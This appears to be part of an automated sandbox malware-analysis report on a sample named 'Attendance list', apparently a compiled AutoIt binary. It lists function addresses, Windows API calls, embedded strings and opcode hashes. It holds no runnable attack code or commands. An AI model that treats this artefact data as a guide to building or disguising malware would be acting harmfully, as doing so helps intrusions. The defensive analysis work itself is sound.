                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction ID: fc92c6268bb9f68232f200533b3b3951d740fb430cf26273a6ee5a57a9757795
                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction Fuzzy Hash: 53C14F322091D309DF6D463B947813EBAE1FAA37B131A076DE8B2CB5D4EF30D5649660
                        Function 00E835E0 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction ID: f0595de9804208007edb0a5b4257c90bdd3e949c964498478b6af3560b852a57
                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction Fuzzy Hash: 3A41B371D1051CEBCF48CFADC991AEEBBF2AF88201F648299D516AB345D730AB41DB50
                        Function 00E83470 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: c51482df9e89cbf4bcb9d6874c64e26bb2780a96a32af82d9547f3ff552069d9
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: 6B019278A04109EFCB44EFA8C5909AEF7F5FB48710F208599E919A7701E734AE41DB80
                        Function 00E834D0 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction ID: 77dde55f0a481e1f07a2846c23642cbfdbcad4a7b7a9fcb169a54e650f8af6a7
                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction Fuzzy Hash: 0B019278A04109EFCB44EFA8C5909AEF7F5FB48710F208599E819A7701E730AE41DB80
                        Function 00E81E70 Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        Function 00937B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00937B70
                        • DeleteObject.GDI32(00000000), ref: 00937B82
                        • DestroyWindow.USER32 ref: 00937B90
                        • GetDesktopWindow.USER32 ref: 00937BAA
                        • GetWindowRect.USER32(00000000), ref: 00937BB1
                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00937CF2
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00937D02
                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937D4A
                        • GetClientRect.USER32(00000000,?), ref: 00937D56
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00937D90
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DB2
                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DC5
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DD0
                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DD9
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DE8
                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DF1
                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937DF8
                        • GlobalFree.KERNEL32(00000000), ref: 00937E03
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937E15
                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00952CAC,00000000), ref: 00937E2B
                        • GlobalFree.KERNEL32(00000000), ref: 00937E3B
                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00937E61
                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00937E80
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00937EA2
                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093808F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 2211948467-2373415609
                        • Opcode ID: 6c0a5c0725b9bd7659a2c0408153dd8d7c9c085121b50564a68b08af492d3a1d
                        • Instruction ID: 6fc60a2e55860b7ddf3ae3b76967ccef38226321dc18b6239401ebc155c5b68d
                        • Opcode Fuzzy Hash: 6c0a5c0725b9bd7659a2c0408153dd8d7c9c085121b50564a68b08af492d3a1d
                        • Instruction Fuzzy Hash: 95026A75914119EFDB14DFA8CC99EAEBBB9FB49310F108158F915AB2A1CB70AD00DF60
                        Function 009437F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?,0094F910), ref: 009438AF
                        • IsWindowVisible.USER32(?), ref: 009438D3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: BuffCharUpperVisibleWindow
                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                        • API String ID: 4105515805-45149045
                        • Opcode ID: 1439b3d101d2fba6d05d03544bd06cc185d79548ea795e713ed98a37b1a10097
                        • Instruction ID: cc181ee12d66b3c328e2ff1d527ea94460ff35ebe46a9a5ee5bd4fbf9042197e
                        • Opcode Fuzzy Hash: 1439b3d101d2fba6d05d03544bd06cc185d79548ea795e713ed98a37b1a10097
                        • Instruction Fuzzy Hash: 39D17E30204305DBCB14EF25C895F6AB7A5FF95354F10895CB8869B2A2CB75EE4ACB42
                        Function 0094A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                        Download Yara Rule
                        APIs
                        • SetTextColor.GDI32(?,00000000), ref: 0094A89F
                        • GetSysColorBrush.USER32(0000000F), ref: 0094A8D0
                        • GetSysColor.USER32(0000000F), ref: 0094A8DC
                        • SetBkColor.GDI32(?,000000FF), ref: 0094A8F6
                        • SelectObject.GDI32(?,?), ref: 0094A905
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0094A930
                        • GetSysColor.USER32(00000010), ref: 0094A938
                        • CreateSolidBrush.GDI32(00000000), ref: 0094A93F
                        • FrameRect.USER32(?,?,00000000), ref: 0094A94E
                        • DeleteObject.GDI32(00000000), ref: 0094A955
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0094A9A0
                        • FillRect.USER32(?,?,?), ref: 0094A9D2
                        • GetWindowLongW.USER32(?,000000F0), ref: 0094A9FD
                          • Part of subcall function 0094AB60: GetSysColor.USER32(00000012), ref: 0094AB99
                          • Part of subcall function 0094AB60: SetTextColor.GDI32(?,?), ref: 0094AB9D
                          • Part of subcall function 0094AB60: GetSysColorBrush.USER32(0000000F), ref: 0094ABB3
                          • Part of subcall function 0094AB60: GetSysColor.USER32(0000000F), ref: 0094ABBE
                          • Part of subcall function 0094AB60: GetSysColor.USER32(00000011), ref: 0094ABDB
                          • Part of subcall function 0094AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0094ABE9
                          • Part of subcall function 0094AB60: SelectObject.GDI32(?,00000000), ref: 0094ABFA
                          • Part of subcall function 0094AB60: SetBkColor.GDI32(?,00000000), ref: 0094AC03
                          • Part of subcall function 0094AB60: SelectObject.GDI32(?,?), ref: 0094AC10
                          • Part of subcall function 0094AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0094AC2F
                          • Part of subcall function 0094AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0094AC46
                          • Part of subcall function 0094AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0094AC5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                        • String ID:
                        • API String ID: 4124339563-0
                        • Opcode ID: e0032f5c75a69e8d869c556148816974022a853d899c00706d4b6587f37f72d4
                        • Instruction ID: df35f49dab947f1f048a8afa0aea3bec2c547ebe67274fb25d9dd0e3625cb35d
                        • Opcode Fuzzy Hash: e0032f5c75a69e8d869c556148816974022a853d899c00706d4b6587f37f72d4
                        • Instruction Fuzzy Hash: 50A19A7601C302EFDB109F64DC18E6BBBA9FF8A321F104A29F962961E1D734D944DB52
                        Function 008C2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?,?,?), ref: 008C2CA2
                        • DeleteObject.GDI32(00000000), ref: 008C2CE8
                        • DeleteObject.GDI32(00000000), ref: 008C2CF3
                        • DestroyIcon.USER32(00000000,?,?,?), ref: 008C2CFE
                        • DestroyWindow.USER32(00000000,?,?,?), ref: 008C2D09
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 008FC68B
                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008FC6C4
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008FCAED
                          • Part of subcall function 008C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008C2036,?,00000000,?,?,?,?,008C16CB,00000000,?), ref: 008C1B9A
                        • SendMessageW.USER32(?,00001053), ref: 008FCB2A
                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008FCB41
                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008FCB57
                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008FCB62
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                        • String ID: 0
                        • API String ID: 464785882-4108050209
                        • Opcode ID: 6e6b5e5bc3bc4dee297737312a30b85bd5c3b671f1f83656e52b6ed61d9f37b0
                        • Instruction ID: 1fb938b8eca4fc59e03e707558870eeba5ee52924b6d7c143937ea422912db49
                        • Opcode Fuzzy Hash: 6e6b5e5bc3bc4dee297737312a30b85bd5c3b671f1f83656e52b6ed61d9f37b0
                        • Instruction Fuzzy Hash: 9E129C34604209EFDB14DF28C984FB9BBB1FF45314F1485A9EA85DB2A2CB31E942DB51
                        Function 009377BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 009377F1
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009378B0
                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009378EE
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00937900
                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00937946
                        • GetClientRect.USER32(00000000,?), ref: 00937952
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00937996
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009379A5
                        • GetStockObject.GDI32(00000011), ref: 009379B5
                        • SelectObject.GDI32(00000000,00000000), ref: 009379B9
                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009379C9
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009379D2
                        • DeleteDC.GDI32(00000000), ref: 009379DB
                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00937A07
                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00937A1E
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00937A59
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00937A6D
                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00937A7E
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00937AAE
                        • GetStockObject.GDI32(00000011), ref: 00937AB9
                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00937AC4
                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00937ACE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: 60b72978ccbd40087b323dd9c661de67566792832f609ee8f312ef7f8cc2c5fd
                        • Instruction ID: 92595fe5c0b1c243387a5f46a06c157b4f07c85a0030347e097f2f96f7301dc2
                        • Opcode Fuzzy Hash: 60b72978ccbd40087b323dd9c661de67566792832f609ee8f312ef7f8cc2c5fd
                        • Instruction Fuzzy Hash: D2A182B1A54205BFEB14DBA4DC4AFAEBBB9EB49714F004154FA14EB2E0C770AD00DB60
                        Function 0092AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0092AF89
                        • GetDriveTypeW.KERNEL32(?,0094FAC0,?,\\.\,0094F910), ref: 0092B066
                        • SetErrorMode.KERNEL32(00000000,0094FAC0,?,\\.\,0094F910), ref: 0092B1C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                        • API String ID: 2907320926-4222207086
                        • Opcode ID: 9f65b28ba7966ea456c7ee1bc02d7c1d1b2d30a09a4b889202c49759c33584f7
                        • Instruction ID: 42f9a9b85030a9033936838c8d87b1587fbc0bdbb569cec8bf30cc279d625970
                        • Opcode Fuzzy Hash: 9f65b28ba7966ea456c7ee1bc02d7c1d1b2d30a09a4b889202c49759c33584f7
                        • Instruction Fuzzy Hash: D651F331A88715EB8B04DB14E9A2EBD73F4FBD4745B208419E40EE729AC738AD51DB43
                        Function 008C6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                        • API String ID: 1038674560-86951937
                        • Opcode ID: 1facb86b22f4d039384a6899940c3473eb6da42f65c336075856bda34f143327
                        • Instruction ID: 20038c926c6288ad39423eb0422fbbcee13bb02c3169c13f989c3df0ba3caba4
                        • Opcode Fuzzy Hash: 1facb86b22f4d039384a6899940c3473eb6da42f65c336075856bda34f143327
                        • Instruction Fuzzy Hash: 5F811770600659AACB20BB65CC92FBE7778FF16304F044039FA45EA192FB70DE65C692
                        Function 0094AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000012), ref: 0094AB99
                        • SetTextColor.GDI32(?,?), ref: 0094AB9D
                        • GetSysColorBrush.USER32(0000000F), ref: 0094ABB3
                        • GetSysColor.USER32(0000000F), ref: 0094ABBE
                        • CreateSolidBrush.GDI32(?), ref: 0094ABC3
                        • GetSysColor.USER32(00000011), ref: 0094ABDB
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0094ABE9
                        • SelectObject.GDI32(?,00000000), ref: 0094ABFA
                        • SetBkColor.GDI32(?,00000000), ref: 0094AC03
                        • SelectObject.GDI32(?,?), ref: 0094AC10
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0094AC2F
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0094AC46
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0094AC5B
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0094ACA7
                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0094ACCE
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0094ACEC
                        • DrawFocusRect.USER32(?,?), ref: 0094ACF7
                        • GetSysColor.USER32(00000011), ref: 0094AD05
                        • SetTextColor.GDI32(?,00000000), ref: 0094AD0D
                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0094AD21
                        • SelectObject.GDI32(?,0094A869), ref: 0094AD38
                        • DeleteObject.GDI32(?), ref: 0094AD43
                        • SelectObject.GDI32(?,?), ref: 0094AD49
                        • DeleteObject.GDI32(?), ref: 0094AD4E
                        • SetTextColor.GDI32(?,?), ref: 0094AD54
                        • SetBkColor.GDI32(?,?), ref: 0094AD5E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1996641542-0
                        • Opcode ID: 65a8f5e8b523953d727a7b386e0675d9c041a17a3ed96a29f618a254574d219d
                        • Instruction ID: 760a04a9c055f7741323d719c60745ec208f6b1748c9400875ea094c2305b740
                        • Opcode Fuzzy Hash: 65a8f5e8b523953d727a7b386e0675d9c041a17a3ed96a29f618a254574d219d
                        • Instruction Fuzzy Hash: BA619B75904209EFDF119FA8DC48EAE7BB9FB09320F118125F911AB2A1D7759D40EF90
                        Function 00948C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00948D34
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00948D45
                        • CharNextW.USER32(0000014E), ref: 00948D74
                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00948DB5
                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00948DCB
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00948DDC
                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00948DF9
                        • SetWindowTextW.USER32(?,0000014E), ref: 00948E45
                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00948E5B
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00948E8C
                        • _memset.LIBCMT ref: 00948EB1
                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00948EFA
                        • _memset.LIBCMT ref: 00948F59
                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00948F83
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00948FDB
                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00949088
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 009490AA
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009490F4
                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00949121
                        • DrawMenuBar.USER32(?), ref: 00949130
                        • SetWindowTextW.USER32(?,0000014E), ref: 00949158
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                        • String ID: 0
                        • API String ID: 1073566785-4108050209
                        • Opcode ID: eb8154fae67113c7f92dee1963498583f064361333de9570e84cde57b780b807
